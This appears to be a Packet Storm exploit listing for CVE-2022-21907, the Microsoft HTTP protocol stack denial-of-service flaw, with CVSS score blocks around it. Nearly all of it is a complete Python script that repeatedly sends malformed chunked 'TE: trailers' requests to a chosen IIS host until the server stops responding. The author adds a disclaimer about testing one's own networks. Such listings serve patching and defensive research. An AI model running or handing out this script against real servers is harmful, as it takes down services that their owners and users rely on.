Lucene search

K
packetstormPolakow, github.comPACKETSTORM:166730
HistoryApr 15, 2022 - 12:00 a.m.

Microsoft HTTP Protocol Stack Denial Of Service

2022-04-1500:00:00
polakow, github.com
packetstormsecurity.com
329

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

`#!/usr/bin/env python3  
# -*- coding: utf-8 -*-  
# Exploit developed by the polakow from the past (@ltdominikow)  
# This exploit was made for testing own networks and patch affected systems. I'm not responsible if you do another thing with this exploit.  
# As a drunk wise man said: "Please, don't be a 'culiao'!" Use this exploit for testing your own network and patch your affected systems.  
  
from colorama import Fore, Style, init  
import argparse  
import socket  
import ssl  
import requests  
from requests.packages.urllib3.exceptions import InsecureRequestWarning  
  
  
def banner():  
print(f"""\n\n{Fore.GREEN} ****** ** ** ******** **** **** **** **** **** ** **** **** ******  
**////**/** /**/**///// */// * *///** */// * */// * */// * *** */// * *///**//////*  
** // /** /**/** / /*/* */*/ /*/ /* / /*//** /* /*/* */* /*  
/** //** ** /******* ***** *** /* * /* *** *** ***** *** /** / **** /* * /* *   
/** //** ** /**//// ///// *// /** /* *// *// ///// *// /** ///* /** /* *   
//** ** //**** /** * /* /* * * * /** * /* /* *   
//****** //** /******** /******/ **** /******/****** /****** **** * / **** *   
////// // //////// ////// //// ////// ////// ////// //// / //// / """)  
print(f"\n\nAuthor: polakow(@ltdominikow)\n{Style.RESET_ALL}")  
print(f"{Fore.RED}[!] Warning: This exploit was made for testing own networks and patch affected systems. I'm not responsible if you do another thing with this exploit.{Style.RESET_ALL}\n")  
print(f"{Fore.CYAN}[*] Patch URL: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21907{Style.RESET_ALL}\n")  
  
  
def parseArgs():  
parser = argparse.ArgumentParser(description="Description message")  
parser.add_argument("-t", "--target", default=None, required=True, help="IIS Server. For instance: 192.168.1.110")  
parser.add_argument("-p", "--port", default=None, required=True, help="Port of the IIS server. For instance: 80")  
parser.add_argument("-v", "--ipversion", default=None, required=True, help="IP version: 4 or 6")  
return parser.parse_args()  
  
  
def isServiceRunning(ip, port, ipVersion):  
  
if port == 443:  
targetURL = "https://"  
else:  
targetURL = "http://"  
  
if ipVersion == 6:  
targetURL = targetURL + '[' + ip + ']'  
else:  
targetURL = targetURL + ip  
  
try:  
requests.get(targetURL, timeout=4, verify=False)  
except Exception as e:  
return False  
  
return True  
  
def checkServerStatus(ip, port, ipVersion):  
if isServiceRunning(ip, port, ipVersion):  
print(f'[*] The server is {Fore.GREEN}running{Style.RESET_ALL}!')  
else:  
print(f'[!] The server is {Fore.RED}not running{Style.RESET_ALL}!')  
  
  
def exploit(ip, port, ipVersion):  
  
print("[*] Attacking: %s on port %d" % (ip, port))  
  
# Evil request  
  
data = "200\r\n" + "A" * 0x200 + "\r\n" + "200\r\n" + "A" * 0x200 + "\r\n" + "200\r\n" + "A" * 0x200 + "\r\n" + "200\r\n" + "A" * 0x200 + "\r\n"  
  
if ipVersion == 6:  
payload = "GET / HTTP/1.1\r\nHost: " + '[' + ip + ']' + ":" + str(port) + "\r\nTE: trailers\r\nTransfer-Encoding: chunked\r\n\r\n" + data + data + "0\r\n\r\n"  
payload2 = "GET /\r\nHost: " + '[' + ip + ']' + ":" + str(port) + "\r\nTE: trailers\r\nTransfer-Encoding: chunked\r\n\r\n" + data + data + "0\r\n\r\n"  
else:  
payload = "GET / HTTP/1.1\r\nHost: " + ip + ":" + str(port) + "\r\nTE: trailers\r\nTransfer-Encoding: chunked\r\n\r\n" + data + data + "0\r\n\r\n"  
payload2 = "GET /\r\nHost: " + ip + ":" + str(port) + "\r\nTE: trailers\r\nTransfer-Encoding: chunked\r\n\r\n" + data + data + "0\r\n\r\n"  
  
# Attack!  
  
for i in range(0, 100000):  
try:  
# IPv6  
if ipVersion == 6:  
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)  
else:  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
  
s.settimeout(5)  
  
# Attack HTTPS or HTTP  
  
if port == 443:  
context = ssl._create_unverified_context()  
so = context.wrap_socket(s, server_hostname=ip)  
  
so.connect((ip, port))  
so.sendall(payload.encode('ascii'))  
if i % 10000 == 0:  
print("[*] Sending evil payload...")  
so.sendall(payload2.encode('ascii'))  
else:  
s.connect((ip, port))  
s.sendall(payload.encode('ascii'))  
if i % 10000 == 0:  
print("[*] Sending evil payload...")  
s.sendall(payload2.encode('ascii'))  
except socket.timeout:  
print("[*] Timeout! Checking server status...")  
checkServerStatus(ip, port, ipVersion)  
break  
except Exception as e:  
print(e)  
break  
  
  
if __name__ == '__main__':  
init(convert=True)  
  
# Banner  
  
banner()  
  
# Args  
args = parseArgs()  
  
port = args.port  
ipVersion = args.ipversion  
  
# Check digits  
  
if not port.isdigit() and not ipVersion.isdigit():  
print("The port must be a number!")  
exit(1)  
  
# Remove protocol  
  
if args.target.startswith('https://'):  
ip = args.target.replace("https://", "")  
elif args.target.startswith('http://'):  
ip = args.target.replace("http://", "")  
else:  
ip = args.target  
  
# Remove backslash  
  
if ip.endswith("/"):  
ip = ip.replace("/", "")  
  
# Remove ipv6 http/https  
  
if ip.endswith("]") and ip.startswith("["):  
ip = ip.replace("[", "").replace("]", "")  
  
# Check ip version  
  
if not int(ipVersion) == 6 and not int(ipVersion) == 4:  
print("The IP version is invalid.")  
exit(1)  
  
# Check server status  
  
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)  
  
checkServerStatus(ip, int(port), int(ipVersion))  
  
# Exploit!  
  
exploit(ip, int(port), int(ipVersion))  
  
`

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C